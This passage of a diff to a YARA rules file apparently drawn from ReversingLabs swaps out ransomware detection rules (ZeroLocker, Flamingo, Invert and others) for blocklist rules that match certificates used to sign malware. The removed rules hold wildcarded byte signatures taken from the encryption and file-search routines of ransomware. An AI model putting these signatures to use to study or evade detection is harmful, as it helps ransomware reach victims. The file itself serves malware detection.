-            ?? 8D 44 24 ?? 68 ?? ?? ?? ?? 57 FF 74 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 0F B6 44 24
-            ?? 3C ?? 75 ?? 83 7C 24 ?? ?? 74 ?? BB ?? ?? ?? ?? BF ?? ?? ?? ?? EB ?? 3C ?? 75 ??
-            8B 5C 24 ?? 8B 73 ?? 8B 3B 8B 06 57 FF D0 83 C4 ?? 8B 46 ?? 85 C0 74 ?? FF 76 ?? 50
-            57 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 31 FF 6A ?? 68 ??
-            ?? ?? ?? FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 F8 89 DA 8D 65 ?? 5E 5F 5B 5D C3
-        }
-		$encrypt_files_full_v2_p1 = {
-            55 89 E5 53 57 56 83 E4 ?? 81 EC ?? ?? ?? ?? 89 D7 89 4C 24 ?? 6A ?? 68 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 89 C3 89 44 24 ?? 0F 85
-            ?? ?? ?? ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? 8D 43 ?? 89 7C 24 ?? 89 44 24 ?? EB ?? 66
-            2E 0F 1F 84 00 ?? ?? ?? ?? 0F 1F 00 8B 06 01 F8 53 FF 74 24 ?? 50 E8 ?? ?? ?? ?? 83
-            C4 ?? 01 DF 8B 5C 24 ?? 89 7E ?? 89 F7 68 ?? ?? ?? ?? 53 FF 74 24 ?? 8D 44 24 ?? 50
-            E8 ?? ?? ?? ?? 83 C4 ?? 0F B6 44 24 ?? 3C ?? 0F 85 ?? ?? ?? ?? 8B 74 24 ?? 85 F6 0F
-            84 ?? ?? ?? ?? 8B 45 ?? 8D 4C 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ??
-            C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 55 ?? F2 0F 10 40 ?? F3 0F 7E 48
-            ?? F2 0F 11 41 ?? F2 0F 10 40 ?? 66 0F D6 49 ?? F2 0F 11 41 ?? F2 0F 10 00 8B 42 ??
-            F2 0F 11 01 F3 0F 7E 02 89 44 24 ?? A1 ?? ?? ?? ?? 66 0F D6 44 24 ?? 0F B6 00 3C ??
-            75 ?? E8 ?? ?? ?? ?? F2 0F 10 44 24 ?? F3 0F 7E 4C 24 ?? 8B 44 24 ?? 8D 8C 24 ?? ??
-            ?? ?? 0F B7 54 24 ?? 81 FE ?? ?? ?? ?? F2 0F 11 84 24 ?? ?? ?? ?? F2 0F 10 44 24 ??
-            66 0F D6 8C 24 ?? ?? ?? ?? F2 0F 11 84 24 ?? ?? ?? ?? F2 0F 10 44 24 ?? F2 0F 11 84
-            24 ?? ?? ?? ?? F2 0F 10 44 24 ?? F2 0F 11 84 24 ?? ?? ?? ?? F2 0F 10 44 24 ?? F2 0F
-            11 44 24 ?? 89 41 ?? F3 0F 7E 44 24 ?? 0F B6 44 24 ?? 66 0F D6 41 ?? C7 41 ?? ?? ??
-            ?? ?? C7 01 ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ??
-            ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ??
-            ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ??
-            ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? 88 41 ?? 66 89 51
-            ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? 0F 83 ?? ?? ?? ?? 89 F0
-        }
-		$encrypt_files_full_v2_p2 = {
-            89 5C 24 ?? 89 5C 24 ?? C1 E8 ?? 89 44 24 ?? 8D 44 24 ?? 50 8D 44 24 ?? 50 E8 ?? ??
-            ?? ?? 83 C4 ?? 89 F3 83 E3 ?? 0F 84 ?? ?? ?? ?? A1 ?? ?? ?? ?? 0F B6 00 3C ?? 75 ??
-            8D 4C 24 ?? 8D 94 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 0F 1F 00 F3 0F 6F 64
-            24 ?? F3 0F 6F 94 24 ?? ?? ?? ?? F3 0F 6F 84 24 ?? ?? ?? ?? F3 0F 6F BC 24 ?? ?? ??
-            ?? B8 ?? ?? ?? ?? 66 0F 6F F4 66 0F 6F DA 66 0F 6F E8 66 0F 7F 7C 24 ?? 0F 1F 84 00
-            ?? ?? ?? ?? 66 0F FE F3 48 66 0F EF EE 66 0F 6F CD 66 0F 72 F5 ?? 66 0F 72 D1 ?? 66
-            0F EB E9 66 0F FE FD 66 0F EF DF 66 0F 6F CB 66 0F 72 F3 ?? 66 0F 72 D1 ?? 66 0F EB
-            D9 66 0F FE F3 66 0F EF EE 66 0F 70 F6 ?? 66 0F 6F CD 66 0F 72 F5 ?? 66 0F 72 D1 ??
-            66 0F EB E9 66 0F FE FD 66 0F 70 ED ?? 66 0F EF DF 66 0F 70 FF ?? 66 0F 6F CB 66 0F
-            72 F3 ?? 66 0F 72 D1 ?? 66 0F EB D9 66 0F FE F3 66 0F EF EE 66 0F 6F CD 66 0F 72 F5
-            ?? 66 0F 72 D1 ?? 66 0F EB E9 66 0F FE FD 66 0F EF DF 66 0F 6F CB 66 0F 72 F3 ?? 66
-            0F 72 D1 ?? 66 0F EB D9 66 0F FE F3 66 0F EF EE 66 0F 70 F6 ?? 66 0F 6F CD 66 0F 72
-            F5 ?? 66 0F 72 D1 ?? 66 0F EB E9 66 0F FE FD 66 0F 70 ED ?? 66 0F EF DF 66 0F 70 FF
-            ?? 66 0F 6F CB 66 0F 72 F3 ?? 66 0F 72 D1 ?? 66 0F EB D9 0F 85 ?? ?? ?? ?? 66 0F FE
-            7C 24 ?? 66 0F 7E C0 66 0F FE F4 66 0F FE DA 66 0F FE E8 40 F3 0F 7F B4 24 ?? ?? ??
-            ?? F3 0F 7F 9C 24 ?? ?? ?? ?? F3 0F 7F BC 24 ?? ?? ?? ?? F3 0F 7F AC 24 ?? ?? ?? ??
-            89 84 24 ?? ?? ?? ?? 8B 44 24 ?? 89 F2 31 C9 83 E2 ?? 83 FB ?? 8D 04 10 0F 82 ?? ??
-            ?? ?? 31 C9 83 FB ?? 72 ?? 03 54 24 ?? 89 F7 89 D9 83 E7 ?? 89 7C 24 ?? 29 F9 31 FF
-        }
-		$encrypt_files_full_v2_p3 = {
-            0F 1F 84 00 ?? ?? ?? ?? F3 0F 6F 44 3A ?? F3 0F 6F 94 3C ?? ?? ?? ?? F3 0F 6F 0C 3A
-            F3 0F 6F 9C 3C ?? ?? ?? ?? 66 0F EF D0 66 0F EF D9 F3 0F 7F 54 3A ?? F3 0F 7F 1C 3A
-            83 C7 ?? 39 F9 75 ?? 8B 54 24 ?? 8B 7C 24 ?? 85 D2 74 ?? 83 FA ?? 72 ?? 89 F2 89 CF
-            89 D9 83 E2 ?? 29 D1 66 2E 0F 1F 84 00 ?? ?? ?? ?? 0F 1F 00 F3 0F 7E 04 38 F3 0F 7E
-            8C 3C ?? ?? ?? ?? 66 0F EF C8 66 0F D6 0C 38 83 C7 ?? 39 F9 75 ?? 8B 7C 24 ?? 85 D2
-            74 ?? 66 2E 0F 1F 84 00 ?? ?? ?? ?? 0F B6 94 0C ?? ?? ?? ?? 30 14 08 41 39 CB 75 ??
-            88 9C 24 ?? ?? ?? ?? 89 F3 8B 47 ?? 89 FE 8B 7F ?? 29 F8 39 D8 0F 87 ?? ?? ?? ?? 53
-            8B 5C 24 ?? 53 56 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 0F B6 44 24 ?? 89 F7 3C ??
-            0F 84 ?? ?? ?? ?? 8B 54 24 ?? 8B 4C 24 ?? 89 54 24 ?? 89 4C 24 ?? 88 44 24 ?? A1 ??
-            ?? ?? ?? 0F B6 00 6A ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? F2 0F
-            10 44 24 ?? 89 C7 BB ?? ?? ?? ?? F2 0F 11 00 EB ?? 8D 44 24 ?? 68 ?? ?? ?? ?? 53 FF
-            74 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 0F B6 44 24 ?? 3C ?? 75 ?? 83 7C 24 ?? ?? 74 ??
-            BB ?? ?? ?? ?? BF ?? ?? ?? ?? EB ?? 3C ?? 75 ?? 8B 5C 24 ?? 8B 73 ?? 8B 3B 8B 06 57
-            FF D0 83 C4 ?? 8B 46 ?? 85 C0 74 ?? FF 76 ?? 50 57 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A
-            ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 31 FF 6A ?? 68 ?? ?? ?? ?? FF 74 24 ?? E8 ?? ?? ?? ??
-            83 C4 ?? 89 F8 89 DA 8D 65 ?? 5E 5F 5B 5D C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $collect_files_recursively_p* ) ) and ( $get_valid_drives ) and ( ( ( all of ( $encrypt_files_full_v1_p* ) ) ) or ( ( all of ( $encrypt_files_full_v2_p* ) ) ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Select'Assistance Pro" and pe.signatures [ i ] . serial == "06:ce:20:94:77:f1:ac:19:a2:04:9b:dc:58:46:a8:31" and 1426710344 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Zerolocker : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_447F449121B883211663B7B7E2Ead868 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects ZeroLocker ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "291b5640-387c-54d9-97a6-13823932fa60"
-		date = "2021-08-12"
-		modified = "2021-08-12"
+		id = "a3ee3618-0e20-5d9c-a514-9020607bd1b0"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/ByteCode.MSIL.Ransomware.ZeroLocker.yara#L1-L70"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "147e4b390bcfaff8f05059c1d9a98b50f544fc32e820406417894fe5046e0f71"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L16194-L16210"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "f473a939d1a27cf53c09d0e4a3753a9444ae3674a55d5b0feafeef6b75dd487f"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "ZeroLocker"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_routine_1 = {
-            00 28 5B 00 00 0A 20 ?? 07 00 00 28 60 00 00 06 13 09 20 ?? 07 00 00 28 60 00 00 06 13
-            0B 02 03 20 ?? 07 00 00 28 60 00 00 06 20 ?? 07 00 00 28 60 00 00 06 73 ?? 00 00 0A 7D
-            1B 00 00 04 20 ?? 07 00 00 28 60 00 00 06 13 0B 02 04 20 ?? 07 00 00 28 60 00 00 06 20
-            ?? 07 00 00 28 60 00 00 06 73 ?? 00 00 0A 7D 1C 00 00 04 20 ?? 07 00 00 28 60 00 00 06
-            13 0B 02 7B 1C 00 00 04 20 ?? 07 00 00 28 60 00 00 06 6A 6F ?? 00 00 0A 00 20 ?? 07 00
-            00 28 60 00 00 06 13 0B 20 ?? 07 00 00 28 60 00 00 06 8D 1E 00 00 01 0A 20 ?? 07 00 00
-            28 60 00 00 06 13 0B 20 ?? 07 00 00 28 60 00 00 06 6A 13 04 20 ?? 07 00 00 28 60 00 00
-            06 13 0B 02 7B 1B 00 00 04 6F ?? 00 00 0A [0-2] 13 05 20 ?? 07 00 00 28 60 00 00 06 13
-            0B 73 ?? 00 00 0A 0C 20 ?? 07 00 00 28 60 00 00 06 13 0B 00 0E 05 20 ?? 07 00 00 28 60
-            00 00 06 59 13 0C 11 0C 45 02 00 00 00 02 00 00 00 ?? 00 00 00 2B ?? 00 20 ?? 07 00 00
-            28 60 00 00 06 13 0B 02 7B 1C 00 00 04 08 05 0E 04 6F ?? 00 00 0A [0-2] 20 ?? 07 00 00
-            28 60 00 00 06 73 ?? 00 00 0A 0B 2B ?? 00 20 ?? 07 00 00 28 60 00 00 06 13 0B 02 7B 1C
-            00 00 04 08 05 0E 04 6F ?? 00 00 0A [0-2] 20 ?? 07 00 00 28 60 00 00 06 73 ?? 00 00 0A
-            0B 00 2B 62 20 ?? 07 00 00 28 60 00 00 06 13 0B 02 7B 1B 00 00 04 06 20 ?? 07 00 00 28
-            60 00 00 06 20 ?? 07 00 00 28 60 00 00 06 6F ?? 00 00 0A [0-2] 0D 20 ?? 07 00 00 28 60
-        }
-		$encrypt_routine_2 = {
-            00 00 06 13 0B 07 06 20 ?? 07 00 00 28 60 00 00 06 09 6F ?? 00 00 0A 00 20 ?? 07 00 00
-            28 60 00 00 06 13 0B 11 04 09 6A D6 13 04 00 20 ?? 07 00 00 28 60 00 00 06 13 0B 11 04
-            11 05 FE 04 13 0D 11 0D 2D 86 ?? 45 01 00 00 00 F6 FF FF FF 17 2D 06 D0 4F 00 00 06 26
-            20 ?? 07 00 00 28 60 00 00 06 13 0B 07 6F ?? 00 00 0A 00 20 ?? 07 00 00 28 60 00 00 06
-            13 0B 02 7B 1B 00 00 04 6F ?? 00 00 0A 00 20 ?? 07 00 00 28 60 00 00 06 13 0B 02 7B 1C
-            00 00 04 6F ?? 00 00 0A 00 20 ?? 07 00 00 28 60 00 00 06 13 0B 0E 05 20 ?? 07 00 00 28
-            60 00 00 06 FE 01 13 0D 11 0D 2C 32 ?? 45 01 00 00 00 F6 FF FF FF 20 ?? 07 00 00 28 60
-            00 00 06 13 0B 03 73 ?? 00 00 0A 13 06 20 ?? 07 00 00 28 60 00 00 06 13 0B 11 06 6F ??
-            00 00 0A 00 00 20 ?? 07 00 00 28 60 00 00 06 13 0B 0E 05 20 ?? 07 00 00 28 60 00 00 06
-            FE 01 13 0D 11 0D 2C ?? [0-20] 20 ?? 07 00 00 28 60 00 00 06 13 0B 03 73 ?? 00 00 0A 13
-            07 20 ?? 07 00 00 28 60 00 00 06 13 0B 11 07 6F ?? 00 00 0A 00 00 20 ?? ?? 00 00 28 60
-            00 00 06 13 0B 02 7B 1B 00 00 04 6F ?? 00 00 0A 00 20 ?? ?? 00 00 28 60 00 00 06 13 0B
-            02 7B 1C 00 00 04 6F ?? 00 00 0A 00 DD 3B 01 00 00 11 0A 2B 0D 11 0A 20 ?? ?? 00 00 28
-        }
-		$encrypt_routine_3 = {
-            60 00 00 06 58 20 ?? 08 00 00 28 60 00 00 06 13 0A 45 26 00 00 00 00 00 00 00 ?? FC FF
-            FF ?? FC FF FF ?? FC FF FF ?? FC FF FF ?? FC FF FF ?? FC FF FF ?? FC FF FF ?? ?? FF FF
-            ?? FD FF FF ?? FD FF FF ?? FD FF FF 00 00 00 00 ?? FD FF FF ?? FD FF FF ?? FD FF FF ??
-            FD FF FF ?? FD FF FF ?? FD FF FF ?? ?? FF FF ?? FD FF FF ?? FD FF FF ?? FD FF FF ?? ??
-            FF FF ?? FE FF FF ?? FE FF FF ?? FE FF FF ?? FE FF FF ?? FE FF FF ?? FE FF FF ?? FE FF
-            FF ?? FE FF FF E8 FE FF FF FC FE FF FF 10 FF FF FF 11 FF FF FF 29 FF FF FF 41 FF FF FF
-            DE 6D 11 0B 13 0A 11 09 20 ?? 08 00 00 28 60 00 00 06 30 16 ?? 45 01 00 00 00 F6 FF FF
-            FF 20 ?? 08 00 00 28 60 00 00 06 2B 02 11 09 45 02 00 00 00 00 00 00 00 11 FF FF FF DE
-            34 75 4B 00 00 01 14 FE 03 11 09 20 ?? 08 00 00 28 60 00 00 06 FE 03 5F 11 0A 20 ?? 08
-            00 00 28 60 00 00 06 FE 01 5F FE 11 74 4B 00 00 01 28 57 00 00 0A DE 93 20 ?? 08 00 00
-            28 60 00 00 06 28 ?? 00 00 0A
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $encrypt_routine_1 and $encrypt_routine_2 and $encrypt_routine_3 )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "3 AM CHP" and pe.signatures [ i ] . serial == "44:7f:44:91:21:b8:83:21:16:63:b7:b7:e2:ea:d8:68" and 1443052800 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Flamingo : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_6366A9Ac97Df4De17366943C9B291Aaa : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Flamingo ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "333ef1f9-ac54-5a3d-9b2b-50483eeb93e1"
-		date = "2021-04-14"
-		modified = "2021-04-14"
+		id = "77d6756b-e948-5771-9ec1-f5159b0e792c"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Flamingo.yara#L1-L54"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "446c0d332af01c0fceb0356d5ab273eb55764869cc8343468b75625e5d4d1036"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L16212-L16228"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "dcdfb78d4d779b1cabcdf5b2da1fa27aaa9faaed4d4967630ce45f30304fe227"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Flamingo"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files = {
-            68 ?? ?? ?? ?? 1B C0 23 C1 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 57 50 E8 ?? ?? ?? ??
-            83 C4 ?? 8D 85 ?? ?? ?? ?? 57 57 57 50 57 53 FF 15 ?? ?? ?? ?? 8B F0 8B 85 ?? ?? ??
-            ?? 83 FE ?? 75 ?? 50 57 57 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B F8 83 FE ?? 74 ?? 56 FF 15
-            ?? ?? ?? ?? 8B C7 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3 8B 48 ?? 2B 08
-            C1 F9 ?? 89 8D ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 75 ?? 8A 8D ?? ?? ?? ?? 84 C9 74 ??
-            80 F9 ?? 75 ?? 80 BD ?? ?? ?? ?? ?? 74 ?? 50 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53
-            50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85
-            C0 8B 85 ?? ?? ?? ?? 75 ?? 8B 10 8B 40 ?? 8B 8D ?? ?? ?? ?? 2B C2 C1 F8 ?? 3B C8 0F
-            84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4 ?? E9
-        }
-		$encrypt_files = {
-            68 ?? ?? ?? ?? 83 EC ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8B CC C7 85 ?? ?? ?? ?? ?? ??
-            ?? ?? C6 85 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ??
-            ?? ?? 83 79 ?? ?? C7 41 ?? ?? ?? ?? ?? 72 ?? 8B 01 EB ?? 8B C1 6A ?? C6 00 ?? 8D 85
-            ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 50 68 ?? ??
-            ?? ?? 51 6A ?? 83 EC ?? C6 45 ?? ?? 8B CC C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ??
-            C7 41 ?? ?? ?? ?? ?? 83 79 ?? ?? C7 41 ?? ?? ?? ?? ?? 72 ?? 8B 01 EB ?? 8B C1 6A ??
-            C6 00 ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ??
-            ?? 8B BD ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50 68 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 8D 47 ?? 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 83 EC ?? 8B CC C7 41 ?? ?? ?? ??
-            ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? 83 79 ?? ?? C7 41 ?? ?? ?? ?? ?? 72 ??
-            8B 01 EB ?? 8B C1 6A ?? C6 00 ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $encrypt_files )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "xlgames" and pe.signatures [ i ] . serial == "63:66:a9:ac:97:df:4d:e1:73:66:94:3c:9b:29:1a:aa" and 1326796477 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Invert : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_66E3F0B4459F15Ac7F2A2B44990Dd709 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Invert ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "7ef77946-a902-5dc6-9b3c-b7b6a687eb96"
-		date = "2021-11-11"
-		modified = "2021-11-11"
+		id = "2fc1303f-e559-59ba-a1b9-b74a154d8805"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/ByteCode.MSIL.Ransomware.Invert.yara#L1-L66"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "1608b8bbfc03b18a79752e60f211da7d7703862bc06b2ddf094074ae5efd0d14"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L16230-L16246"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "a563f1485ae8887c46f45d1366f676894c7db55954671825b37372f786ce0d3d"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Invert"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files = {
-            73 ?? ?? ?? ?? 0A 06 04 7D ?? ?? ?? ?? 00 00 02 28 ?? ?? ?? ?? 06 7B ?? ?? ?? ?? 25 2D
-            ?? 26 06 06 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 0C 7D ?? ?? ?? ?? 08 7E ?? ?? ?? ?? 25
-            2D ?? 26 7E ?? ?? ?? ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 80 ?? ?? ?? ?? 28 ?? ?? ??
-            ?? 7E ?? ?? ?? ?? 25 2D ?? 26 7E ?? ?? ?? ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 80 ??
-            ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 25 2D ?? 26 7E ?? ?? ?? ?? FE 06 ?? ?? ?? ?? 73
-            ?? ?? ?? ?? 25 80 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 25 2D ?? 26 7E ?? ?? ?? ??
-            FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 80 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 25 2D
-            ?? 26 7E ?? ?? ?? ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 80 ?? ?? ?? ?? 28 ?? ?? ?? ??
-            7E ?? ?? ?? ?? 25 2D ?? 26 7E ?? ?? ?? ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 80 ?? ??
-            ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0B 2B ?? 07 6F ?? ?? ?? ?? 0D 00 00 09 03 28 ?? ??
-            ?? ?? 13 ?? 11 ?? 2C ?? 00 7E ?? ?? ?? ?? 09 6F ?? ?? ?? ?? 26 00 00 DE ?? 26 00 00 DE
-            ?? 00 07 6F ?? ?? ?? ?? 2D ?? DE ?? 07 2C ?? 07 6F ?? ?? ?? ?? 00 DC 2A
-        }
-		$find_files = {
-            00 73 ?? ?? ?? ?? 0A 00 28 ?? ?? ?? ?? 18 8D ?? ?? ?? ?? 25 16 28 ?? ?? ?? ?? A2 25 17
-            72 ?? ?? ?? ?? A2 17 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0B 2B ?? 12 ?? 28 ??
-            ?? ?? ?? 0C 00 06 08 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 26 00 12 ?? 28 ?? ?? ?? ?? 2D ?? DE
-            ?? 12 ?? FE 16 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 DC 06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 26 06
-            0D 2B ?? 09 2A
-        }
-		$get_file_list = {
-            00 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 06 2C
-            ?? 00 02 73 ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 00 38 ?? ??
-            ?? ?? 00 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 0B
-            00 00 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0C 2B ?? 12 ?? 28 ?? ?? ?? ?? 0D 00 07 09 6F ?? ??
-            ?? ?? 00 00 12 ?? 28 ?? ?? ?? ?? 2D ?? DE ?? 12 ?? FE 16 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00
-            DC 00 DE ?? 07 2C ?? 07 6F ?? ?? ?? ?? 00 DC 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ??
-            ?? 28 ?? ?? ?? ?? 18 28 ?? ?? ?? ?? 00 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28
-            ?? ?? ?? ?? 18 28 ?? ?? ?? ?? 00 02 73 ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 6F
-            ?? ?? ?? ?? 00 00 2A
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $get_file_list ) and ( $find_files ) and ( $encrypt_files )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "KOG Co., Ltd." and pe.signatures [ i ] . serial == "66:e3:f0:b4:45:9f:15:ac:7f:2a:2b:44:99:0d:d7:09" and 1320288125 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Paradise : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_610039D6349Ee531E4Caa3A65D100C7D : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Paradise ransomware."
+		description = "Certificate used for digitally signing malware."
